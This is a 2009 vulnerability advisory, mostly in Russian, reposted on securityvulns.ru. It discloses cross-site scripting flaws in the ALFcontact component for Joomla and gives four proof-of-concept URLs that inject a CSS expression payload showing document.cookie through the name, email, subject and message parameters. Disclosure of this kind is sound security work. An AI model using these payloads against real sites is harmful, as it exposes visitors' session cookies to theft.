Computer Security

Security Advisory: Cross-Site Scripting vulnerabilities in ALFcontact for Joomla
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  DvBBS v2.0(PHP) boardrule.php Sql injection

  New Bug Found By Ostoure Sazan Sharif

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:04.09.2009
Subject:Cross-Site Scripting vulnerabilities in ALFcontact for Joomla

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в компоненте
ALFcontact (com_alfcontact) для Joomla.

XSS:

Возможна атака как через POST, так и GET запросы.

http://site/component/option,com_alfcontact/?name=%22%20style=%22xss:
expression(alert(document.cookie))

http://site/component/option,
com_alfcontact/?email=%22%20style=%22xss:
expression(alert(document.cookie))

http://site/component/option,
com_alfcontact/?subject=%22%20style=%22xss:
expression(alert(document.cookie))

http://site/component/option,
com_alfcontact/?message=%22%20style=%22xss:
expression(alert(document.cookie))

Уязвимы ALFcontact 1.8, 1.9 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3471/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server